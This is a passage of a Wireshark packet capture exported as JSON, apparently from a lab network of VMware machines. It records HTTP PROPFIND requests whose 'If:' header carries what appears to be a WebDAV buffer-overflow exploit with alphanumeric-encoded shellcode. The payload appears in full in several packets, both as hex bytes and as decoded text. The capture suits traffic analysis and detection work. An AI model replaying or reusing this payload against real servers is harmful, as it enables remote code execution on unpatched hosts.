"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6a:54:48:64:6d:59:48:62:44:57:62:46:6f:41:48:54:52:74:57:4e:57:64:6d:65:41:42:73:4e:78:46:74:77:6c:70:70:5a:46:79:63:67:6d:62:6f:63:61:71:7a:68:59:41:59:52:59:4b:4f:76:69:61:6f:55:79:6c:6f:46:66:4f:49:50:4a:74:74:4d:43:56:5a:6d:48:63:55:59:6b:73:51:6d:56:78:65:43:41:56:6d:69:44:6b:69:6c:6e:4a:44:4b:48:e4:85:a9:e4:85:b9:e5:99:b7:e4:8d:ac:e6:89:b5:e6:89:8a:e5:a1:a3:e5:a5:9a:e4:a1:a7:e6:89:b6:e5:85:ad:e5:8d:b5:e6:a1:aa:e7:95:82:e5:a1:97:e5:a5:9a:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:bd:99:e7:a1:b1:e5:a5:97:e6:9d:b9:e5:85:96:e6:91:b9:e5:85:88:e5:8d:a8:e6:bd:a7:e4:b1:87:e5:a9:b2:e4:89:96:e7:99:91:e6:9d:8b:e7:89:aa:e4:b1:b8:e6:ad:ac:e7:a5:93:e5:a9:84:e4:a9:8f:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6b:75:42:6f:69:63:68:4a:67:74:6c:70:73:59:76:75:41:68:4d:6d:4f:69:78:51:77:59:42:47:6b:70:7a:51:6a:48:42:53:79:49:58:6d:77:78:49:4c:75:53:43:47:5a:51:49:48:73:68:71:50:67:4a:6a:5a:75:47:45:52:48:73:70:62:6b:6c:76:72:66:63:66:6c:4f:4e:6f:65:45:73:64:4b:7a:4f:6e:6c:50:48:68:58:73:6d:62:55:47:56:6d:75:56:e4:91:93:e7:8d:ac:e5:91:98:e6:99:87:e7:a9:b9:e6:91:b0:e4:a9:98:e7:95:94:e7:89:99:e7:a1:9a:e7:91:84:e5:91:8d:e6:a9:9a:e7:a1:ab:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e5:81:99:e5:91:99:e7:95:8b:e7:8d:aa:e1:8f:80:e6:a0:83:e7:a9:b5:e5:95:85:e4:91:93:e5:81:95:e7:a5:90:e4:91:93:e4:bd:8c:e6:8d:a2:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/jTHdmYHbDWbFoAHTRtWNWdmeABsNxFtwlppZFycgmbocaqzhYAYRYKOviaoUyloFfOIPJttMCVZmHcUYksQmVxeCAVmiDkilnJDKH<4B><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/kuBoichJgtlpsYvuAhMmOixQwYBGkpzQjHBSyIXmwxILuSCGZQIHshqPgJjZuGERHspbklvrfcflONoeEsdKzOnlPHhXsmbUGVmuV<75><56><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "224"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.517299000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.517299000",
|
||
"frame.time_delta": "0.000009000",
|
||
"frame.time_delta_displayed": "0.005991000",
|
||
"frame.time_relative": "16.768239000",
|
||
"frame.number": "231",
|
||
"frame.len": "329",
|
||
"frame.cap_len": "329",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "315",
|
||
"ip.id": "0x0000a49c",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00008bb9",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "36993",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "36993",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "44",
|
||
"tcp.len": "263",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "372556464",
|
||
"tcp.nxtseq": "1712",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2819560024",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000da1e",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cb:24:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cb:24:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868324",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000624000",
|
||
"tcp.analysis.bytes_in_flight": "1711",
|
||
"tcp.analysis.push_bytes_sent": "1711"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.001040000",
|
||
"tcp.time_delta": "0.000009000"
|
||
},
|
||
"tcp.payload": "69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "230",
|
||
"tcp.segment": "231",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1711",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:55:58:6b:4d:61:46:46:68:47:69:78:66:55:69:63:65:71:64:4f:57:6c:44:79:62:53:47:4d:6c:4e:72:4c:69:45:70:6d:6a:6a:69:75:5a:6a:6e:61:63:51:46:5a:70:41:6a:4f:76:51:4a:75:59:78:63:55:66:63:4d:43:63:4c:4c:75:4f:6b:76:6f:59:51:55:4b:41:48:77:69:68:4c:59:7a:4d:6e:6c:70:70:59:62:45:4e:6c:75:71:6d:53:6b:65:6b:e6:95:a7:e7:a1:90:e7:a5:ba:e4:ad:b2:e6:b5:a7:e6:b9:b3:e6:a5:ad:e4:b9:b3:e6:8d:af:e7:89:a1:e4:9d:b9:e6:91:8f:e4:b1:86:e5:a9:b9:e7:81:98:e5:81:97:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:9d:a6:e5:99:af:e6:89:88:e7:a5:84:e4:9d:95:e4:b5:b6:e4:95:8f:e6:bd:8a:e5:a1:b6:e6:bd:87:e4:ad:94:e5:8d:8c:e5:8d:a7:e4:89:81:e7:89:99:e6:9d:b1:e6:b1:84:e4:b1:87:e7:8d:90:e4:b5:81:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6a:44:6d:47:4f:63:42:51:7a:52:56:68:54:4f:76:55:44:73:4d:52:56:74:68:64:43:76:74:45:56:63:52:6c:7a:4f:7a:72:64:61:79:57:48:79:4e:6c:4d:51:44:4d:50:61:6e:66:46:7a:48:48:47:63:4c:57:52:75:68:66:4e:42:55:42:56:6f:6e:46:6c:62:41:66:54:64:74:42:70:67:4a:73:5a:79:6a:47:62:43:50:61:55:49:57:67:53:7a:55:6c:e7:a1:a3:e7:95:a7:e4:91:8e:e4:a9:81:e4:8d:96:e5:81:b1:e5:85:a6:e4:a1:98:e4:a9:ba:e6:ad:8b:e7:81:ac:e6:99:af:e6:8d:b8:e7:99:b8:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e6:b9:81:e4:b1:b6:e5:81:a2:e6:99:a8:e1:8f:80:e6:a0:83:e6:bd:b2:e6:a1:a4:e4:a5:84:e6:b5:a8:e4:95:a3:e7:a9:94:e4:bd:ab:e6:85:86:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51: